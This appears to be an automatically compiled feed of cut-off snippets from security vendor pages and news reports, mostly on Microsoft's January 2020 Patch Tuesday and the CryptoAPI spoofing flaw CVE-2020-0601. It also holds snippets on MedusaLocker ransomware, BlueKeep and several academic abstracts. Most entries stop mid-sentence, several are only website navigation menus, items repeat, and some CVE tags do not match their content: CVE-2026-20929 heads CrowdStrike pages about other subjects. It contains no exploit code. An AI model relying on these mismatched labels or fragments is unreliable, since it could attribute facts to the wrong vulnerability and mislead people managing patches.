[CRITICAL] January Patch Tuesday: IE, RDP, Crypto Bugs Updates # January Patch Tuesday: IE, RDP, Crypto Bugs Updates Microsoft released 49 patches in this cycle, eight of which are classifed Critical and the remaining 41 as Important. The fixes address a range of products, including RDP Gateway servers, Internet Explorer, CryptoAPI, Office, and OneDrive. By: Trend Micro 2020/01/15 Read time: ( words) Save to Folio 2020 starts off with a relatively heavy list of patches for Microsoft users. January is typically a light month for fixes, but Microsoft released patches for 49 vulnerabilities (eight of which are Critical and all the remaining classified as Important) in this cycle. None of these vulnerabilities are known to be under attack at this time. The listed vulnerabilities covered a range of Microsoft products including Windows RDP Gateway ser

CVE-2020-0601 [HIGH] Tenable Releases Plugins for Critical Windows CryptoAPI Vulnerability ## Tenable Releases Plugins for Critical Windows CryptoAPI Vulnerability January 15, 2020 · Columbia, MD Tenable®, Inc. , the Cyber Exposure company, has released plugins for CVE-2020-0601, a critical vulnerability in the cryptographic library used in Windows 10 and Windows Server 2016/2019. The flaw would allow attackers to deliver malicious code that appears to be from a trusted entity. The vulnerability, which was disclosed by the National Security Agency (NSA), reportedly bypasses Windows’ capability to verify cryptographic trust, which would enable an attacker to pass malicious applications off as legitimate, trusted code. “This vulnerability, and the attention it’s received from various government agencies, is unprecedented. It calls into question our very trust in today’s digita

Cryptic Rumblings Ahead of First 2020 Patch Tuesday Sources tell KrebsOnSecurity that Microsoft Corp. is slated to release a software update on Tuesday to fix an extraordinarily serious security vulnerability in a core cryptographic component present in all versions of Windows. Those sources say Microsoft has quietly shipped a patch for the bug to branches of the U.S. military and to other high-value customers/targets that manage key Internet infrastructure, and that those organizations have been asked to sign agreements preventing them from disclosing details of the flaw prior to Jan. 14, the first Patch Tuesday of 2020. According to sources, the vulnerability in question resides in a Windows component known as crypt32.dll, a Windows module that Microsoft says handles “certificate and cryptographic messaging functions in the CryptoAPI.” T

CVE-2020-0601 [HIGH] Microsoft Windows CryptoAPI Spoofing Vulnerability (CVE-2020-0601) – How to Detect and Remediate ## Table of Contents Exploits/PoC: Detecting CVE-2020-0601 with Qualys VM Remediating with Qualys Patch Management: Qualys Threat Protection Mitigation Get Started Now Update January 31, 2020 : Client testing is now available at clienttest.ssllabs.com . Update January 15, 2020 : Detection dashboard now available. Today, Microsoft released patch for CVE-2020-0601 , aka Curveball, a vulnerability in windows “crypt32.dll” component that could allow attackers to perform spoofing attacks. This was discovered and reported by National Security Agency (NSA) Researchers. The vulnerability affects Windows 10 and Windows Server 2016/2019 systems. This is a serious vulnerability and patches should be applied immediately. An attacker could exploit this vulnerability by using a spoofed code-si

CVE-2020-0601 [HIGH] Microsoft Windows CryptoAPI Spoofing Vulnerability (CVE-2020-0601) – How to Detect and Remediate | Qualys #### Table of Contents - Exploits/PoC: - Detecting CVE-2020-0601 with Qualys VM - Remediating with Qualys Patch Management: - Qualys Threat Protection - Mitigation - Get Started Now Update January 31, 2020: Client testing is now available at clienttest.ssllabs.com. Update January 15, 2020: Detection dashboard now available. Today, Microsoft released patch for CVE-2020-0601, aka Curveball, a vulnerability in windows “crypt32.dll” component that could allow attackers to perform spoofing attacks. This was discovered and reported by National Security Agency (NSA) Researchers. The vulnerability affects Windows 10 and Windows Server 2016/2019 systems. This is a serious vulnerability and patches should be applied immediately. An attacker could exploit this vulnerability by using a spoofed co

CVE-2020-0601 [HIGH] Microsoft Patch Tuesday — Jan. 2020: Vulnerability disclosures and Snort coverage ## Microsoft Patch Tuesday — Jan. 2020: Vulnerability disclosures and Snort coverage By Jon Munshaw. Updated January 15th: Added an Advanced Custom Detection (ACD) signature for AMP that can be used to detect exploitation of CVE-2020-0601 by spoofing certificates masquerading as a Microsoft ECC Code Signing Certificate Authority. Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 49 vulnerabilities, eight of which are considered critical. This month's security update is particularly important for its disclosure of two vulnerabilities related to a core cryptographic component in all versions of Windows. CVE-2020-0601 could allow an attacker to use cryptography

Critical Windows Update-CryptoAPI Spoofing | Blog Provide users with seamless, secure, reliable access to applications and data. Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud. Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems. Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners. Industry Report Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE) USE CASES INDUSTRY & MARKET SOLUTIONS PARTNERS TECHNOLOGY PARTNERS Resource Center Events & Trainings Security Research & Services Tools Community & Support CXO REVOLUTIONARIES Amplifying the voices of real-world digital and zero trust pioneers Discover how it began and where it’s going Meet o

Microsoft’s January 2020 Patch Tuesday Kicks Off the New Year with 49 New CVEs ## Cloud Exposure Tenable Cloud Security (CNAPP) Request a demo Tenable Cloud Vulnerability Management Request a demo Tenable CIEM Request a demo Secure your cloud ## Vulnerability Exposure Tenable Vulnerability Management Try for free Tenable Security Center Request a demo Tenable Web App Scanning Try for free Tenable Patch Management Request a demo Tenable Enclave Security Request a demo Tenable Attack Surface Management Request a demo Tenable Nessus Try for free ## AI Exposure Tenable AI Exposure Request a demo ## OT/IoT Exposure Tenable OT Security Request a demo ## Identity Exposure Tenable Identity Exposure Request a demo ## Business needs Active Directory AI Security Posture Management (AI-SPM) AWS security Azure security Cloud Security Posture Man

CVE-2020-0601 [HIGH] Microsoft Patch Tuesday — Jan. 2020: Vulnerability disclosures and Snort coverage By Jon Munshaw. Updated January 15th: Added an Advanced Custom Detection (ACD) signature for AMP that can be used to detect exploitation of CVE-2020-0601 by spoofing certificates masquerading as a Microsoft ECC Code Signing Certificate Authority. Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 49 vulnerabilities, eight of which are considered critical. This month's security update is particularly important for its disclosure of two vulnerabilities related to a core cryptographic component in all versions of Windows. CVE-2020-0601 could allow an attacker to use cryptography to sign a malicious executable, making the file appear as if it was from a trusted sou

CVE-2020-0601 [HIGH] January 2020 Patch Tuesday – 50 Vulns, 8 Critical, Adobe Vulns | Qualys This month’s Microsoft Patch Tuesday addresses 50 vulnerabilities with only 8 of them labeled as Critical. Of the 8 Critical vulns, one is for browser and scripting engines, 3 are for .NET Framework and one for ASP.NET. In addition, Microsoft has patched 3 critical RCEs in Remote Desktop Gateway and Remote Desktop Client. Adobe issued patches today for Illustrator CC and Experience Manager. ### CryptoAPI Spoofing A spoofing vulnerability (CVE-2020-0601) has been patched in Windows CryptoAPI (Crypt32.dll). An attacker can perform man-in-the-middle attacks and decrypt confidential information on user connections to the affected software by using a spoofed code-signing certificate. Although Microsoft rated this as Important, NSA privately disclosed this vulnerability to Microsoft and should

CVE-2020-0601 [HIGH] January 2020 Patch Tuesday – 50 Vulns, 8 Critical, Adobe Vulns This month’s Microsoft Patch Tuesday addresses 50 vulnerabilities with only 8 of them labeled as Critical. Of the 8 Critical vulns, one is for browser and scripting engines, 3 are for .NET Framework and one for ASP.NET. In addition, Microsoft has patched 3 critical RCEs in Remote Desktop Gateway and Remote Desktop Client. Adobe issued patches today for Illustrator CC and Experience Manager. ## CryptoAPI Spoofing A spoofing vulnerability ( CVE-2020-0601 ) has been patched in Windows CryptoAPI (Crypt32.dll). An attacker can perform man-in-the-middle attacks and decrypt confidential information on user connections to the affected software by using a spoofed code-signing certificate. Although Microsoft rated this as Important, NSA privately disclosed this vulnerability to Microsoft and shoul

[HIGH] CVE-2020-0601: NSA Reported Spoofing Vulnerability in Windows CryptoAPI ## Cloud Exposure Tenable Cloud Security (CNAPP) Request a demo Tenable Cloud Vulnerability Management Request a demo Tenable CIEM Request a demo Secure your cloud ## Vulnerability Exposure Tenable Vulnerability Management Try for free Tenable Security Center Request a demo Tenable Web App Scanning Try for free Tenable Patch Management Request a demo Tenable Enclave Security Request a demo Tenable Attack Surface Management Request a demo Tenable Nessus Try for free ## AI Exposure Tenable AI Exposure Request a demo ## OT/IoT Exposure Tenable OT Security Request a demo ## Identity Exposure Tenable Identity Exposure Request a demo ## Business needs Active Directory AI Security Posture Management (AI-SPM) AWS security Azure security Cloud Security Posture Man

Cryptic Rumblings Ahead of First 2020 Patch Tuesday Sources tell KrebsOnSecurity that Microsoft Corp. is slated to release a software update on Tuesday to fix an extraordinarily serious security vulnerability in a core cryptographic component present in all versions of Windows . Those sources say Microsoft has quietly shipped a patch for the bug to branches of the U.S. military and to other high-value customers/targets that manage key Internet infrastructure, and that those organizations have been asked to sign agreements preventing them from disclosing details of the flaw prior to Jan. 14, the first Patch Tuesday of 2020. According to sources, the vulnerability in question resides in a Windows component known as crypt32.dll , a Windows module that Microsoft says handles “certificate and cryptographic messaging functions in the CryptoAPI.”

MedusaLocker Ransomware: Encryption, Costs, and Protection In September of this year, our research team began to track and observe a recently-identified ransomware family dubbed MedusaLocker . This particular ransomware family has a few unique features designed to ensure it encrypts as much data as possible, not only on the locally infected machine but across a network. MedusaLocker’s ability to force connectivity to remote (mapped) drives along with its persistence mechanisms are particularly problematic. In this post, we take a look at how MedusaLocker works and how it is different from other recent ransomware strains. Delivery of MedusaLocker follows a fairly standard and established pattern. Current data indicates that the malicious payloads are distributed via phishing and spam email. The examples we have analyzed show the malware attached d

[CRITICAL] Fortinet Security Researchers Discover Multiple Vulnerabilities in Adobe and Cisco Products FORTIGUARD LABS THREAT RESEARCH Fortinet Security Researchers Discover Multiple Vulnerabilities in Adobe and Cisco Products By Peixue Li | November 15, 2019 This past Patch Tuesday, November 12th, Adobe announced a number of Security Updates for Adobe Illustrator CC. They included two critical vulnerabilities that were originally discovered by Fortinet Threat Researcher Kushal Arvind Shah. The week before, on Wednesday, November 6th, a number of Security Updates were also released by Cisco Systems. They included five high risk vulnerabilities for their Cisco Webex Network Recording Player and Webex Player tools. These vulnerabilities were also discovered by Kushal Arvind Shah as well as Fortinet security researcher Yici Zhang. All of these vulnerabilities have now been patched. More in

CVE-2019-0708 [CRITICAL] CVE-2019-0708 – Remote Desktop Protocol and Remote Code Execution #Bluekeep FORTIGUARD LABS THREAT RESEARCH CVE-2019-0708 – Remote Desktop Protocol and Remote Code Execution #Bluekeep By FortiGuard SE Team | May 23, 2019 On May 14th, 2019, Microsoft released their usual set of updates, referred to within the industry as “Patch Tuesday.” At first glance, the inclusion of CVE-2019-0708 appeared to be similar to all the other updates released on that day—it included a writeup containing an overview of the update, including the Impact (Remote Code Execution), Severity (Critical), and Platforms (multiple) affected. However, what piqued the curiosity of the security community was that the platforms listed as affected by this vulnerability were products considered to be no longer supported by Microsoft: Windows XP SP3 x86, Windows XP Professional x64 Edition SP2, Win

CVE-2026-20929 [HIGH] Category STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026 Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026 Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026 How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026 STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026 Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026 Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026 How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026 Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019 Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI

[HIGH] Zscaler protects against 3 new vulnerabilities for Microsoft Windows and Internet Explorer | Zscaler Provide users with seamless, secure, reliable access to applications and data. Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud. Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems. Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners. Industry Report Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE) USE CASES INDUSTRY & MARKET SOLUTIONS PARTNERS TECHNOLOGY PARTNERS Resource Center Events & Trainings Security Research & Services Tools Community & Support CXO REVOLUTIONARIES Amplifying the voices of real-world digital and zero trust pioneers Discover how it began and where it’s going Meet o

CVE-2026-20929 [HIGH] How Insiders Use Vulnerabilities Against Organizations STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026 Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026 Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026 How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026 STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026 Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026 Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026 How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026 Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019 Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI

CVE-2026-20929 [HIGH] CrowdStrike Protects Against CVE-2020-0601 Vulnerability STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026 Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026 Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026 How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026 STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026 Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026 Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026 How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026 Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019 Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI

CVE-2026-20929 [HIGH] Vulnerability Roundup: 10 Critical CVEs of 2020 STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026 Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026 Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026 How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026 STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026 Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026 Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026 How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026 Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019 Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI

TELSAFE: Security Gap Quantitative Risk Assessment Framework TELSAFE: Security Gap Quantitative Risk Assessment Framework %Based on Event Tree Modeling Sarah Ali Siddiqui1E-mail:[email protected], Chandra Thapa1, Derui Wang1, Rayne Holland1, Wei Shao1, Seyit Camtepe1, Hajime Suzuki1 and Rajiv Shah2 1CSIRO Data61, Sydney, Australia 2MDR Security, Canberra, Australia ## Abstract Gaps between established security standards and their practical implementation have the potential to introduce vulnerabilities , possibly exposing them to security risks. To effectively address and mitigate these security and compliance challenges, security risk management strategies are essential. However, it must adhere to well-established strategies and industry standards to ensure consistency, reliability, and compatibility both within and across organiza

Do Chase Your Tail! Missing Key Aspects Augmentation in Textual Vulnerability Descriptions of Long-tail Software through Feature Inference Do Chase Your Tail! Missing Key Aspects Augmentation in Textual Vulnerability Descriptions of Long-tail Software through Feature Inference Linyi Han, Shidong Pan, Zhenchang Xing, Jiamou Sun, Sofonias Yitagesu, Xiaowang Zhang, Zhiyong Feng Manuscript received XXX XXX, 20XX. (Corresponding author: Xiaowang Zhang) Linyi Han, Sofonias Yitagesu, Xiaowang Zhang, and Zhiyong Feng are with the College of Intelligence and Computing, Tianjin University, Tianjin, China. e-mail: \hanly2, xiaowangzhang, zyfeng\@tju.edu.cn and [email protected]. Shidong Pan, Zhenchang Xing, and Jiamou Sun are with the CSIRO's Data61, Canberra, Australia. e-mail: \Shidong.Pan, Zhenchang.Xing, Frank.Sun\@data61.csiro.au Linyi Han is also the Center of National Railway Intelligent Transportation System Engineeri

Microservice Vulnerability Analysis: A Literature Review with Empirical Insights Microservice Vulnerability Analysis: A Literature Review with Empirical Insights Raveen Kanishka Jayalath* University of Adelaide, Australia [email protected] Hussain Ahmad* *Authors contributed equally to this work. Corresponding author. University of Adelaide, Australia [email protected] Diksha Goel CSIRO's Data61, Australia [email protected] 3cmMuhammad Shuja Syed 3cmSLB, USA [email protected] Faheem Ullah University of Adelaide, Australia [email protected] plain ## Abstract Microservice architectures are revolutionizing both small businesses and large corporations, igniting a new era of innovation with their exceptional advantages in maintainability, reusability, and scalability. However, these benefits come w

Crimson: Empowering Strategic Reasoning in Cybersecurity through Large Language Models Crimson: Empowering Strategic Reasoning in Cybersecurity through Large Language Models [1]Jiandong Jin [1]Bowen Tang [1]Mingxuan Ma [1]Xiao Liu [2]Yunfei Wang [1]Qingnan Lai [1]Jia Yang [1]Changling ZhouCorresponding author: [email protected] [1]Peking University, Beijing, China [2]National University of Defense Technology, Changsha, China empty ### Abstract We introduces Crimson, a system that enhances the strategic reasoning capabilities of Large Language Models (LLMs) within the realm of cybersecurity. By correlating CVEs with MITRE ATT&CK techniques, Crimson advances threat anticipation and strategic defense efforts. Our approach includes defining and evaluating cybersecurity strategic tasks, alongside implementing a comprehensive human-in-the-loop data-synthetic workflow to devel